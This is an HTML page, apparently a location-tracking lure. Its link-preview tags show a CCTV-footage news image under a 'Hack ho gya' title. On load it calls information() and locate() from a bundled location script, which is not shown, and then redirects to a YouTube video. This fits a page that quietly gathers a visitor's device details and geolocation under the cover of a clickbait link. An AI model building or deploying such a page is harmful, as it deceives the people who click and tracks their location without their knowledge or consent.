<!DOCTYPE html>
<html lang="en">
<head>
	<meta property="og:title" content="Hack ho gya ">
	<meta property="og:site_name" content="Coding Junction">
	<meta property="og:description" content="hsfhsfgsdgs">
	<meta property="og:image" content="https://i.postimg.cc/WbD64402/CCTV-footage-of-the-incident-showed-one-of-the-ass-1748110358561.jpg">
	<title>Hack ho gya </title>
	<script type="text/javascript">
    	if (window.location.protocol == "http:") {
        	var restOfUrl = window.location.href.substr(5);
        	
    	}
    </script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script type="text/javascript" src="js/location.js"></script>
</head>
<body onload="information();locate(function(){window.location='https://www.youtube.com/watch?v=3pVKJfX59v0';}, function(){$('#change').html('Failed');});">
</body>
</html>